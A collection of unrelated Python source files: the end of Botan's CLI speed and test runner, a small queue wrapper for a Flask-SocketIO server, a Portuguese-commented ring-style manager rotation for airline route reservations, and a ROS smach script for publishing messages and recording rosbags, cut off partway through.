expected_stderr=b"Usage error: Invalid integer value 'F00F' for option buf-size\n%s" % (speed_usage))
test_cli("speed", ["--buf-size=90000000", "--msec=1", "AES-128"],
expected_stderr=b"Usage error: Specified buffer size is too large\n%s" % (speed_usage))
test_cli("speed", ["--clear-cpuid=goku", "--msec=1", "AES-128"],
expected_stderr=b"Warning don't know CPUID flag 'goku'\n")
def cli_speed_math_tests(_tmp_dir):
msec = 1
# these all have a common output format
math_ops = ['mp_mul', 'mp_div', 'mp_div10', 'modexp', 'random_prime', 'inverse_mod',
'rfc3394', 'fpe_fe1', 'ecdsa_recovery', 'ecc_init', 'poly_dbl',
'bn_redc', 'nistp_redc', 'ecc_mult', 'ecc_ops', 'os2ecp', 'primality_test']
format_re = re.compile(r'^.* [0-9]+ /sec; [0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9]+(\.[0-9]+)? ms\)')
for op in math_ops:
output = test_cli("speed", ["--msec=%d" % (msec), op], None).split('\n')
for line in output:
if format_re.match(line) is None:
logging.error("Unexpected line %s", line)
def cli_speed_tests(_tmp_dir):
# pylint: disable=too-many-branches
msec = 1
output = test_cli("speed", ["--msec=%d" % (msec), "--buf-size=64,512", "AES-128"], None).split('\n')
if len(output) % 4 != 0:
logging.error("Unexpected number of lines for AES-128 speed test")
# pylint: disable=line-too-long
format_re = re.compile(r'^AES-128 .* buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB\/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms\)')
for line in output:
if format_re.match(line) is None:
logging.error("Unexpected line %s", line)
output = test_cli("speed", ["--msec=%d" % (msec), "ChaCha20", "SHA-256", "HMAC(SHA-256)"], None).split('\n')
# pylint: disable=line-too-long
format_re = re.compile(r'^.* buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB\/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms\)')
for line in output:
if format_re.match(line) is None:
logging.error("Unexpected line %s", line)
output = test_cli("speed", ["--msec=%d" % (msec), "AES-128/GCM"], None).split('\n')
format_re_ks = re.compile(r'^AES-128/GCM\(16\).* [0-9]+ key schedule/sec; [0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9\.]+ ms\)')
format_re_cipher = re.compile(r'^AES-128/GCM\(16\) .* buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB\/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms\)')
for line in output:
if format_re_ks.match(line) is None:
if format_re_cipher.match(line) is None:
logging.error('Unexpected line %s', line)
output = test_cli("speed", ["--msec=%d" % (msec), "scrypt"], None).split('\n')
format_re = re.compile(r'^scrypt-[0-9]+-[0-9]+-[0-9]+ \([0-9]+ MiB\) [0-9]+ /sec; [0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9\.]+ ms\)')
for line in output:
if format_re.match(line) is None:
logging.error("Unexpected line %s", line)
output = test_cli("speed", ["--msec=%d" % (msec), "RNG"], None).split('\n')
# ChaCha_RNG generate buffer size 1024 bytes: 954.431 MiB/sec 4.01 cycles/byte (477.22 MiB in 500.00 ms)
format_re = re.compile(r'^.* generate buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms')
for line in output:
if format_re.match(line) is None:
logging.error("Unexpected line %s", line)
# Entropy source rdseed output 128 bytes estimated entropy 0 in 0.02168 ms total samples 32
output = test_cli("speed", ["--msec=%d" % (msec), "entropy"], None).split('\n')
format_re = re.compile(r'^Entropy source [_a-z0-9]+ output [0-9]+ bytes estimated entropy [0-9]+ in [0-9]+\.[0-9]+ ms .*total samples [0-9]+')
for line in output:
if format_re.match(line) is None:
logging.error("Unexpected line %s", line)
output = test_cli("speed", ["--msec=%d" % (msec), "--format=json", "AES-128"], None)
json_blob = json.loads(output)
if len(json_blob) < 2:
logging.error("Unexpected size for JSON output")
for b in json_blob:
for field in ['algo', 'op', 'events', 'bps', 'buf_size', 'nanos']:
if field not in b:
logging.error('Missing field %s in JSON record %s' % (field, b))
def run_test(fn_name, fn):
start = time.time()
tmp_dir = tempfile.mkdtemp(prefix='botan_cli_')
try:
fn(tmp_dir)
except Exception as e: # pylint: disable=broad-except
logging.error("Test %s threw exception: %s", fn_name, e)
shutil.rmtree(tmp_dir)
end = time.time()
logging.info("Ran %s in %.02f sec", fn_name, end-start)
def main(args=None):
# pylint: disable=too-many-branches,too-many-locals
if args is None:
args = sys.argv
parser = optparse.OptionParser(
formatter=optparse.IndentedHelpFormatter(max_help_position=50))
parser.add_option('--verbose', action='store_true', default=False)
parser.add_option('--quiet', action='store_true', default=False)
parser.add_option('--threads', action='store', type='int', default=0)
(options, args) = parser.parse_args(args)
setup_logging(options)
if len(args) < 2:
logging.error("Usage: %s path_to_botan_cli [test_regex]", args[0])
return 1
if not os.access(args[1], os.X_OK):
logging.error("Could not access/execute %s", args[1])
return 2
threads = options.threads
if threads == 0:
threads = multiprocessing.cpu_count()
global CLI_PATH
CLI_PATH = args[1]
test_regex = None
if len(args) == 3:
try:
test_regex = re.compile(args[2])
except re.error as e:
logging.error("Invalid regex: %s", str(e))
return 1
# some of the slowest tests are grouped up front
test_fns = [
cli_speed_tests,
cli_speed_pk_tests,
cli_speed_math_tests,
cli_speed_pbkdf_tests,
cli_speed_table_tests,
cli_speed_invalid_option_tests,
cli_xmss_sign_tests,
cli_argon2_tests,
cli_asn1_tests,
cli_base32_tests,
cli_base58_tests,
cli_base64_tests,
cli_bcrypt_tests,
cli_cc_enc_tests,
cli_cycle_counter,
cli_cert_issuance_tests,
cli_compress_tests,
cli_config_tests,
cli_cpuid_tests,
cli_dl_group_info_tests,
cli_ec_group_info_tests,
cli_entropy_tests,
cli_factor_tests,
cli_gen_dl_group_tests,
cli_gen_prime_tests,
cli_hash_tests,
cli_help_tests,
cli_hex_tests,
cli_hmac_tests,
cli_is_prime_tests,
cli_key_tests,
cli_mod_inverse_tests,
cli_pbkdf_tune_tests,
cli_pk_encrypt_tests,
cli_pk_workfactor_tests,
cli_psk_db_tests,
cli_rng_tests,
cli_roughtime_check_tests,
cli_roughtime_tests,
cli_timing_test_tests,
cli_tls_ciphersuite_tests,
cli_tls_client_hello_tests,
cli_tls_http_server_tests,
cli_tls_proxy_tests,
cli_tls_socket_tests,
cli_trust_root_tests,
cli_tss_tests,
cli_uuid_tests,
cli_version_tests,
]
tests_to_run = []
for fn in test_fns:
fn_name = fn.__name__
if test_regex is None or test_regex.search(fn_name) is not None:
tests_to_run.append((fn_name, fn))
start_time = time.time()
if threads > 1:
pool = ThreadPool(processes=threads)
results = []
for test in tests_to_run:
results.append(pool.apply_async(run_test, test))
for result in results:
result.get()
else:
for test in tests_to_run:
run_test(test[0], test[1])
end_time = time.time()
print("Ran %d tests with %d failures in %.02f seconds" % (
TESTS_RUN, TESTS_FAILED, end_time - start_time))
if TESTS_FAILED > 0:
return 1
return 0
if __name__ == '__main__':
sys.exit(main())
|
ansible.py | from multiprocessing import Process, Queue
from Queue import Empty
from ansible_server import ansible_server
# DON'T USE THIS UNLESS YOU KNOW WHAT YOU'RE DOING
# Low level message sending. For high level messaging, use send_msg.
def send(msg):
send_queue.put_nowait(msg)
# Use this one instead of send
def send_message(msg_type, content):
send({
'header': {'msg_type': msg_type},
'content': content
})
# Receives a message, or None if there is no current message.
def recv():
try:
return recv_queue.get_nowait()
except Empty:
return None
# Start up the Flask-SocketIO server
send_queue = Queue()
recv_queue = Queue()
ansible_p = Process(target=ansible_server, args=(send_queue, recv_queue))
ansible_p.start()
|
gerenciador_de_manager.py | import threading
from requests import get, post
from time import sleep
TEMPO_POR_companhia_EM_S = 5 #quantidade de tempo que será destinada a cada companhia
class Gerenciador_de_manager:
def __init__(self, companhias:dict, trajetos_para_reservar:list, who_am_i:str, semaphore_de_liberação_resolver_pedidos:threading.Semaphore, pode_fazer_reserva:bool):
self.companhias = companhias
self.companhia = who_am_i
self.trajetos_para_reservar = trajetos_para_reservar
self.semaphore_de_liberação_resolver_pedidos = semaphore_de_liberação_resolver_pedidos
self.pode_fazer_reserva = pode_fazer_reserva
self.manager = None
self.temp_companhias = list(companhias)
self.ciclo = False
self.thread = None
##Verificamos se existe um manager no sistema
exist_manager = self.__verificar_se_existe_manager__()
##se não existir manager, começa um ciclo (isso acontece quando nenhuma das companhias que conhecemos está ativa)
if(not exist_manager):
self.init_circulo()
##Se já existir uma manager, esperamos o próximo ciclo para entrarmos na rotação
def init_circulo(self):
'''
Se nao existir uma thread executando o ciclo principal do Ring uma é iniciada
'''
if(self.thread is None):
semafaro = threading.Semaphore()
semafaro.acquire()
thread = threading.Thread(target=self.__main_loop__,kwargs={'semaphore':semafaro})
thread.setDaemon(True)
thread.start()
self.thread = (thread,semafaro)
def __main_loop__(self,semaphore:threading.Semaphore):
'''
Loop principal executado no Ring, fazendo um ciclo pela ordem de companhias conhecidas e inicializando uma thread
para lidar com os requests de reserva quando for sua vez de execução
@param estou_resolvendo_pedido: threading.Semaphore (mutex) que controla
quando devemos para fazer novas iterações pelo Ring
'''
while not semaphore.acquire(False):
self.temp_companhias = list(self.companhias) # fazemos uma copia para o caso de ter alteração nao quebrar o loop ( assim companhias adicionadas depois ficariam para proxima rotação )
self.esperar_nova_rodada()
sleep(1)
print('[Gerenciador de manager] rodada começada')
self.ciclo = True
while(len(self.temp_companhias) > 0): #enquanto todas as companhias não forem managers
self.manager = self.temp_companhias.pop() #pegamos o primeiro da lista para ser o manager
print(f'[Gerenciador de manager] manager atual = {self.manager}')
#como essa lista propagada é pela rede, toda vez que uma companhia nova entra em contato com alguma que está na rede,
#todas as companhias que esta conhecem tem a mesma lista
if(self.manager == self.companhia): #se for nossa companhia
self.start_resolver_pedidos() #liberamos para os nossos pedidos serem resolvidos
else:
sleep(TEMPO_POR_companhia_EM_S) #dormimos pelo período que a companhia será deixada como manager
#verificamos se o manager está fazendo operação
# (uma vez que o tempo acabou, ele irá passar a vez para o próximo, porém
# isso pode demorar um pouco, pois ele ainda está fazendo uma operação
# e deve terminar ela)
while(self.verificar_manager()): #se ele estiver fazendo
sleep(.2) #esperando 200 ms para perguntar novamente
#então o loop continua passando para o próximo manager
self.ciclo = False
semaphore.release()
del(semaphore)
print(f"[Gerenciador Manager] finalizando")
def start_resolver_pedidos(self):
'''
Função para iniciar uma thread que resolve pedidso de reserva no sistema
esta função so encera apos a thread ser encerada, nao temos a função da thread
nesta função pois ela é responsavel por determina o tempo no qual a thread deve deixar
de fazer operações por montivos de tempo, a thread tambem pode encerrar encerra suas
operações pois outro servidor acha que o seu tempo ja acabou
'''
semaphore_resolvendo_pedido:threading.Semaphore = self.init_thread_resolver_pedidos()
sleep(TEMPO_POR_companhia_EM_S) # esperamos o tempo
self.semaphore_de_liberação_resolver_pedidos.release() # pegamos o semaphore de volta ( isso pode ter atraso caso um pedido ainda esteja sendo resolvido )
semaphore_resolvendo_pedido.acquire() # esperamos se estiver terminando de resolver operação no momento que o tempo dele acabou
def __resolver_reserva_trajeto__(self,estou_resolvendo_pedido:threading.Semaphore):
'''
Função da thread de resolver reserva de trajetos
@param estou_resolvendo_pedido: threading.Semaphore (mutex) que controla
quando devemos para de resovler pedidos
'''
self.pode_fazer_reserva=True
self.semaphore_de_liberação_resolver_pedidos.acquire() # libramos o semaphore
while not self.semaphore_de_liberação_resolver_pedidos.acquire(False):
if(self.pode_fazer_reserva):
if(len(self.trajetos_para_reservar) > 0):
estou_resolvendo_pedido.acquire()
pedido = self.trajetos_para_reservar.pop()
pedido.reservar()
estou_resolvendo_pedido.release()
else:
sleep(.1)
else:
break
self.semaphore_de_liberação_resolver_pedidos.release() #solta o acquire que aconteceu na verificação de visualização se continuamos tentando resolver
self.pode_fazer_reserva = False
def init_thread_resolver_pedidos(self) -> threading.Semaphore:
'''
Função que cria e inicia a thread de resolver pedidos
@return: threading.Semaphore ( mutex ) que encerra a execução da thread
'''
estou_resolvendo_pedido=threading.Semaphore()
t = threading.Thread(target = self.__resolver_reserva_trajeto__, kwargs = {"estou_resolvendo_pedido":estou_resolvendo_pedido}, daemon = True)
t.setDaemon(True)
t.start()
return estou_resolvendo_pedido
def verificar_manager(self):
'''
Função que faz a verificação se o manager esta fazendo operação
@return: bool indicando se o manager respondeu que esta fazendo operação
'''
try: #tentamos
resp = get(f'{self.companhias[self.manager]}/fazendo_operação', timeout = 1) #fazer um request para o manager, se ele está fazendo operação
except Exception: #se der erro, ele caiu, então não está
return False #logo, retornamos false
return resp.status_code == 201 #teve resposta e ele não passou a vez ainda, ele ainda está fazendo operação então retornamos true
def esperar_nova_rodada(self):
'''
Função que trava a inicialização do Ring ate que todas as companhias conhecidas
respondam que esta na faze de iniciar um novo ciclo
'''
temp_comp = self.companhias.copy()
for companhia,href in temp_comp.items():
keep_going = True
while keep_going: #neste loop, esperamos até que todos os servidores conectados concordem em iniciar um novo ciclo
keep_going = False
resp = None
try: # tentamos
print(f'[Gerenciador de manager] esperando por {companhia=}')
resp = get(f'{href}/ciclo_iniciar',timeout=1)# fazer um request para as companhias que conhecemos perguntando se o ciclo deles acabou tambemx
except Exception as e:
pass
if(resp is not None and resp.status_code == 200): #se alguma das respostas não for
keep_going = True
else:
sleep(.1)
def __verificar_se_existe_manager__(self) -> bool:
'''
Função que verifica se existe manager em alguma das companhias conhecidas
se alguma delas ja estiver executado concluimos que ja existe e so devemos iniciar nosso
Ring quando esta compania pergunta se agente esta no modo de iniciar ciclo, pois pela
inicialização nos passamos para ela ( para as companhias conhecidas ) nossas informações,
ou seja, ela nos conhece e faria essa pergunta
@return: bool indicando se existe alguma companhia com manager ( se alguma companhia conhecida ja tem seu Ring sendo executado )
'''
existe_manager = False
comp_to_check = self.companhias.copy() # para o caso de uma companhia ser adicionada enquanto estamos iterando nao gerar um erro fazemos uma copia
for companhia,href in comp_to_check.items(): # para cada companhia que conhecemos
try:
resp = get(f'{href}/tem_manager',timeout=1) # pedimos se esta companhia tem um manager
except Exception: # caso ela esteja desligada
print(f'[Gerenciador de manager] {companhia=} nao respondeu')
continue # assim skipamos a parte abaixo
# se algumas delas responder quer dizer que estao ligadas entao existe um manager
existe_manager=True
break # assim que acharmos manager em 1 companhias podemos para de procuirar
return existe_manager
def end_afther_ciclo(self):
'''
função para parar execução do main loop apos o ciclo atual do Ring
'''
thread,semafaro = self.thread
semafaro.release()
self.thread = None
if __name__ == "__main__":
a = {1:12}
gerenciador = Gerenciador_de_manager(a)
print(f'{a=} | {gerenciador.companhias=}')
a[2] = 21
print(f'{a=} | {gerenciador.companhias=}') |
rosbag_cli_recording_1_generate_output.py | #!/usr/bin/env python
import roslib
import rospy
import smach
import smach_ros
from geometry_msgs.msg import Point
from geometry_msgs.msg import Point32
from geometry_msgs.msg import PointStamped
from geometry_msgs.msg import Pose
from geometry_msgs.msg import PoseStamped
from geometry_msgs.msg import Quaternion
from geometry_msgs.msg import PoseArray
from sensor_msgs.msg import PointCloud
from sensor_msgs import point_cloud2 as pc2
from sensor_msgs.msg import PointCloud2
from sensor_msgs.point_cloud2 import create_cloud_xyz32
import threading
import os
import subprocess
import signal
import time
def parse_pointstamped(point_input):
"""
Parse point_input into PointStamped.
"""
try:
assert isinstance(point_input, PointStamped)
return point_input
except:
pass
try:
assert isinstance(point_input, Point)
point = PointStamped(point = point_input)
point.header.stamp = rospy.Time.now()
return point
except:
pass
try:
assert isinstance(point_input, Point32)
point = PointStamped(point = Point(x=point_input.x, y=point_input.y, z=point_input.z))
point.header.stamp = rospy.Time.now()
return point
except:
pass
try:
point = point_input
point = PointStamped(point = Point(x=point[0], y=point[1], z=point[2]))
point.header.stamp = rospy.Time.now()
return point
except Exception as e:
raise ValueError('Point not properly specified (should be Point, PointStamped or [3] list type)!')
def parse_posestamped(pose_input):
"""
Parse pose_input into PoseStamped.
"""
try:
assert isinstance(pose_input, PoseStamped)
return pose_input
except:
pass
try:
assert isinstance(pose_input, Pose)
pose = PoseStamped(pose = pose_input)
pose.header.stamp = rospy.Time.now()
return pose
except:
pass
try:
pose = pose_input
position = Point(x=pose_input[0][0], y=pose_input[0][1], z=pose_input[0][2])
orientation = Quaternion(x=pose_input[1][0], y=pose_input[1][1], z=pose_input[1][2], w=pose_input[1][3])
pose = PoseStamped(pose = Pose(position=position, orientation=orientation))
pose.header.stamp = rospy.Time.now()
return pose
except Exception as e:
raise ValueError('Pose not properly specified (should be Pose, PoseStamped or [[3],[4]] list)!')
def parse_posearray(posearray_input):
"""
Parse posearray_input into a PoseArray.
"""
try:
assert isinstance(posearray_input, PoseArray)
return posearray_input
except:
pass
try:
assert isinstance(posearray_input, list)
posearray = PoseArray()
for pose in posearray_input:
try:
assert isinstance(pose, Pose)
posearray.poses.append(pose)
continue
except:
pass
try:
assert isinstance(pose, PoseStamped)
posearray.poses.append(pose.pose)
continue
except:
pass
try:
position = Point(x=pose[0][0], y=pose[0][1], z=pose[0][2])
orientation = Quaternion(x=pose[1][0], y=pose[1][1], z=pose[1][2], w=pose[1][3])
pose = Pose(position=position, orientation=orientation)
posearray.poses.append(pose)
continue
except Exception as e:
raise ValueError('Pose in pose array input not properly specified (should be Pose, PoseStamped or [[3],[4]] list)!')
posearray.header.stamp = rospy.Time.now()
return posearray
except Exception as e:
raise ValueError('Pose array not properly specified (should be PoseArray or list of Pose, PoseStamped or [[3],[4]] list types)!')
def parse_pointcloud(pointcloud_input):
"""
Parse pointcloud_input into PointCloud.
"""
try:
assert isinstance(pointcloud_input, PointCloud)
return pointcloud_input
except:
pass
try:
points = pc2.read_points(pointcloud_input, skip_nans=True, field_names=('x', 'y', 'z'))
return PointCloud(points = map(lambda point: Point32(*point), points))
except Exception as e:
raise ValueError('Point cloud not properly specified (should be PointCloud or PointCloud2 type): ' + repr(e))
def parse_pointcloud2(pointcloud_input):
"""
Parse pointcloud_input into PointCloud2.
"""
try:
assert isinstance(pointcloud_input, PointCloud2)
return pointcloud_input
except:
pass
try:
points = [[point.x, point.y, point.z] for point in pointcloud_input.points]
pointcloud2 = create_cloud_xyz32(header=pointcloud_input.header, points=points)
return pointcloud2
except:
raise ValueError('Point cloud not properly specified (should be PointCloud or PointCloud2 type)!')
class MsgPublisher(object):
"""
"""
def __init__(self):
# A dict of message publishers indexed by topic
self._pubs = dict()
# A dict of messages indexed by topic
self._msgs = dict()
# A dict of callbacks indexed by topic
self._callbacks = dict()
# A dict of message publication rates indexed by topic
self._pub_rates = dict()
# A dict of message publisher threads indexed by topic
self._pub_threads = dict()
# A dict of message publisher stop flags indexed by topic
self._stop_flags = dict()
# Length of timeout (in seconds) for waiting for the threads to finish
# publishing before forcibly unpublishing.
self._unpublish_timeout = 10.0
def _run_pub_thread(self, topic):
r = rospy.Rate(self._pub_rates[topic])
while not self._stop_flags[topic]:
# Apply callback to message
if self._callbacks[topic]:
try:
self._msgs[topic] = self._callbacks[topic](self._msgs[topic])
except Exception as e:
rospy.logerr('Error when applying callback to message being published on topic {}: {}'.format(topic, repr(e)))
# Publish message
try:
self._pubs[topic].publish(self._msgs[topic])
except Exception as e:
rospy.logerr('Error while publishing to topic {}: {}'.format(topic, repr(e)))
r.sleep()
self._unpublish(topic)
def _unpublish(self, topic):
try:
self._pubs[topic].unregister()
except Exception as e:
rospy.logerr('Failed to unregister publisher of topic {}: {}'.format(topic, repr(e)))
raise
del self._pubs[topic]
del self._msgs[topic]
del self._callbacks[topic]
del self._pub_rates[topic]
def start(self, msg, topic, rate, frame_id=None, callback=None):
# Set the message publisher stopping flag
self._stop_flags[topic] = False
# Save the message
self._msgs[topic] = msg
# Save the message publication rate
self._pub_rates[topic] = rate
# Use frame_id if specified
if frame_id:
try:
assert(isinstance(frame_id, str))
self._msgs[topic].header.frame_id = frame_id
except:
rospy.logwarn('Failed to add specified frame_id {} to message for publication on topic {}: {}'.format(frame_id, topic, repr(e)))
# Use callback if specified
if callback:
try:
assert(callable(callback))
self._callbacks[topic] = callback
except:
rospy.logwarn('Failed to add specified callback {} to publisher of topic {}: {}'.format(callback, topic, repr(e)))
self._callbacks[topic] = None
else:
self._callbacks[topic] = None
# Add publisher
try:
self._pubs[topic] = rospy.Publisher(topic, type(self._msgs[topic]))
except Exception as e:
del self._pub_rates[topic]
self._msgs[topic]
rospy.logwarn('Failed to add publisher for topic {}: {}'.format(topic, repr(e)))
return 'aborted'
# Spin up the message publication thread
self._pub_threads[topic] = threading.Thread(target=self._run_pub_thread, args=[topic])
self._pub_threads[topic].start()
return 'succeeded'
def stop(self, topic):
# Signal thread to stop publishing
self._stop_flags[topic] = True
# Wait for the topic to be unpublished
t = rospy.get_time()
r = rospy.Rate(self._pub_rates[topic])
while topic in list(self._pubs.keys()):
if rospy.get_time() - t < self._unpublish_timeout:
r.sleep()
else:
break
else:
return 'succeeded'
# If the publisher is still running, issue a warning and attempt forced unpublish.
rospy.logwarn('Warning: timeout exceeded for stopping publisher thread for topic {}. Attempting forced stop...'.format(topic))
try:
self._unpublish(topic)
except Exception as e:
rospy.logerr('Error during forced stop of publisher of topic {}: {}'.format(topic, repr(e)))
return 'aborted'
return 'succeeded'
def stop_all(self):
# Stop all current publishers
for topic in self._pubs.keys():
if self.stop(topic) != 'succeeded':
return 'aborted'
return 'succeeded'
class PublishMsgState(smach.State):
def __init__(self, name, msg_publisher, action, input_keys = ['msg', 'topic', 'rate'], output_keys = ['msg', 'topic'], callbacks = None):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=['succeeded', 'aborted'])
# Save the state name
self._name = name
# Save the MsgPublisherObserver object reference
self._msg_publisher = msg_publisher
# Save the action
self._action = action
# Set up dict of parsing functions for certain message types/classes.
self._msg_parsers = {"<class 'geometry_msgs.msg._Point.Point'>": parse_pointstamped,
"<class 'geometry_msgs.msg._PointStamped.PointStamped'>": parse_pointstamped,
"<class 'geometry_msgs.msg._Pose.Pose'>": parse_posestamped,
"<class 'geometry_msgs.msg._PoseStamped.PoseStamped'>": parse_posestamped,
"<class 'geometry_msgs.msg._PoseArray.PoseArray'>": parse_posearray,
"<class 'sensor_msgs.msg._PointCloud.PointCloud'>": parse_pointcloud,
"<class 'sensor_msgs.msg._PointCloud2.PointCloud2'>": parse_pointcloud2}
self._cbs = []
if callbacks:
for cb in sorted(callbacks):
if cb in globals():
self._cbs.append(globals()[cb])
elif cb in locals():
self._cbs.append(locals()[cb])
elif cb in dir(self):
self._cbs.append(getattr(self, cb))
self._cb_input_keys = []
self._cb_output_keys = []
self._cb_outcomes = []
for cb in self._cbs:
if cb and smach.has_smach_interface(cb):
self._cb_input_keys.append(cb.get_registered_input_keys())
self._cb_output_keys.append(cb.get_registered_output_keys())
self._cb_outcomes.append(cb.get_registered_outcomes())
self.register_input_keys(self._cb_input_keys[-1])
self.register_output_keys(self._cb_output_keys[-1])
self.register_outcomes(self._cb_outcomes[-1])
def _parse_msg(self, msg, msg_type=None):
# First try using a known parser for a specified msg_type.
try:
assert msg_type
msg_class = str(roslib.message.get_message_class(msg_type))
published_msg = self._msg_parsers[msg_class](msg)
return published_msg
except:
pass
# Next, try to select a known parser by checking the type of message.
try:
msg_class = str(type(msg))
published_msg = self._msg_parsers[msg_class](msg)
return published_msg
except:
pass
# Next, try each message type parser in succession and see if something sticks.
for _, parser in self._msg_parsers.items():
try:
published_msg = parser(msg)
return published_msg
except:
pass
# Finally, if none of the above stuck, just return the original message.
return msg
def execute(self, userdata):
# Call callbacks
for (cb, ik, ok) in zip(self._cbs,
self._cb_input_keys,
self._cb_output_keys):
# Call callback with limited userdata
try:
cb_outcome = cb(self, smach.Remapper(userdata,ik,ok,{}))
except:
cb_outcome = cb(smach.Remapper(userdata,ik,ok,{}))
# Start or stop the message publisher
outcome = 'aborted'
if self._action == 'start':
# Parse msg
try:
if 'msg_type' in self._input_keys:
published_msg = self._parse_msg(userdata.msg, msg_type=userdata.msg_type)
else:
published_msg = self._parse_msg(userdata.msg)
except Exception as e:
rospy.logerr('Failed to parse message: '.format(repr(e)))
return 'aborted'
# Get topic if it's specified as an input key
if 'topic' in self._input_keys:
topic = userdata.topic
# Otherwise, construct it from the state name
else:
topic = 'smacha/' + self._name.lower()
# Get rate if it's specified as an input key
if 'rate' in self._input_keys:
rate = userdata.rate
else:
rate = 100.0
# Get callback if it's specified as an input key
if 'callback' in self._input_keys:
callback = userdata.callback
else:
callback = ''
# Get frame_id if it's specified as an input key
if 'frame_id' in self._input_keys:
frame_id = userdata.frame_id
else:
frame_id = ''
# Start the publisher
outcome = self._msg_publisher.start(published_msg, topic, rate, frame_id=frame_id, callback=callback)
elif self._action == 'stop':
outcome = self._msg_publisher.stop(topic)
elif self._action == 'stop_all':
outcome = self._msg_publisher.stop_all()
# Set topic output key if specified
if self._action == 'start' and outcome == 'succeeded':
for output_key in ['topic', 'output_topic', 'topic_output']:
if output_key in self._output_keys:
setattr(userdata, output_key, topic)
# Set msg output key if specified
if self._action == 'start' and outcome == 'succeeded':
for output_key in ['msg', 'output_msg', 'msg_output']:
if output_key in self._output_keys:
setattr(userdata, output_key, published_msg)
return outcome
class ROSBagCLIProcessRecorder(object):
"""A rosbag recorder class that uses subprocess calls to the rosbag CLI
(command-line interface) recording tool in order to circumvent threading
and Python GIL (global interpreter lock) issues.
"""
def __init__(self):
# A dict of bag recording processes indexed by bag filenames
self._processes = dict()
def start(self, bag_file, topics):
"""Start a rosbag recording.
"""
try:
if not topics:
topics = ['-a']
if not bag_file.endswith('.bag'):
time_str = time.strftime('%Y-%m-%d-%H-%M-%S')
bag_file = bag_file + '_' + time_str + '.bag'
# cmd = ['rosbag', 'record', '-j'] + topics + ['-O', bag_file]
cmd = ['rosbag', 'record'] + topics + ['-O', bag_file]
rospy.loginfo('Starting rosbag CLI recording with command: \'{}\''.format(' '.join(cmd)))
self._processes[bag_file] = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
except Exception as e:
rospy.logerr('Unable to start recording rosbag file \'{}\' with topics {}: {}'.format(bag_file, topics, repr(e)))
return 'aborted'
return 'succeeded'
def stop(self, bag_file):
"""Stop a rosbag recording.
See: https://answers.ros.org/question/10714/start-and-stop-rosbag-within-a-python-script/
"""
try:
rospy.loginfo('Stopping rosbag CLI recording process for rosbag file \'{}\''.format(bag_file))
# Kill child processes
ps_command = subprocess.Popen('ps -o pid --ppid {} --noheaders'.format(self._processes[bag_file].pid), shell=True, stdout=subprocess.PIPE)
ps_output = ps_command.stdout.read()
retcode = ps_command.wait()
assert retcode == 0, 'ps command returned {}'.format(retcode)
for pid_str in ps_output.split("\n")[:-1]:
os.kill(int(pid_str), signal.SIGINT)
# Kill parent process
os.kill(self._processes[bag_file].pid, signal.SIGINT)
except Exception as e:
rospy.logerr('Unable to terminate rosbag CLI recording process for rosbag file \'{}\': {}'.format(bag_file, repr(e)))
return 'aborted'
try:
assert(os.path.exists(bag_file))
except:
rospy.logwarn('rosbag file \'{}\''.format(bag_file) +
'was not detected on the file system after rosbag CLI process recording stopped ' +
'(it may take more time for the process to terminate)!')
return 'succeeded'
def stop_all(self):
"""Stop all rosbag recordings.
"""
for bag_file in list(self._processes.keys()):
if self.stop(bag_file) != 'succeeded':
return 'aborted'
return 'succeeded'
class RecordROSBagState(smach.State):
def __init__(self, name, bag_recorder, action, input_keys=['file', 'topics'], output_keys=[], callbacks = None):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=['succeeded', 'aborted'])
# Save the state name
self._name = name
# Save the ROSBagRecorder object reference
self._bag_recorder= bag_recorder
# Save the action
self._action = action
self._cbs = []
if callbacks:
for cb in sorted(callbacks):
if cb in globals():
self._cbs.append(globals()[cb])
elif cb in locals():
self._cbs.append(locals()[cb])
elif cb in dir(self):
self._cbs.append(getattr(self, cb))
self._cb_input_keys = []
self._cb_output_keys = []
self._cb_outcomes = []
for cb in self._cbs:
if cb and smach.has_smach_interface(cb):
self._cb_input_keys.append(cb.get_registered_input_keys())
self._cb_output_keys.append(cb.get_registered_output_keys())
self._cb_outcomes.append(cb.get_registered_outcomes())
self.register_input_keys(self._cb_input_keys[-1])
self.register_output_keys(self._cb_output_keys[-1])
self.register_outcomes(self._cb_outcomes[-1])
def execute(self, userdata):
# Call callbacks
for (cb, ik, ok) in zip(self._cbs,
self._cb_input_keys,
self._cb_output_keys):
# Call callback with limited userdata
try:
cb_outcome = cb(self, smach.Remapper(userdata,ik,ok,{}))
except:
cb_outcome = cb(smach.Remapper(userdata,ik,ok,{}))
# Get filename from userdata
try:
bag_file = userdata.file
assert(isinstance(bag_file, str))
except Exception as e:
rospy.logerr('The rosbag filename must be specified as a userdata input key: {}'.format(repr(e)))
return 'aborted'
# Get topic names from userdata
try:
topics = userdata.topics
assert(not any(not isinstance(x, str) for x in topics))
except Exception as e:
rospy.logerr('Topic names must be specified as a userdata input key: {}'.format(repr(e)))
return 'aborted'
# Start or stop recording
outcome = 'aborted'
if self._action == 'start' or self._action == 'record':
outcome = self._bag_recorder.start(bag_file, topics)
elif self._action == 'stop':
outcome = self._bag_recorder.stop(bag_file)
elif self._action == 'stop_all':
outcome = self._bag_recorder.stop_all()
return outcome
class SleepState(smach.State):
def __init__(self, time, input_keys = [], output_keys = [], callbacks = [], outcomes=['succeeded']):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=outcomes)
self._time = time
def execute(self, userdata):
rospy.sleep(self._time)
return 'succeeded'
def main():
rospy.init_node('sm')
msg_publisher = MsgPublisher()
bag_recorder = ROSBagCLIProcessRecorder()
sm = smach.StateMachine(outcomes=['succeeded', 'aborted'])
sm.userdata.rate = 100.0
sm.userdata.file = ''
sm.userdata.topics = ''
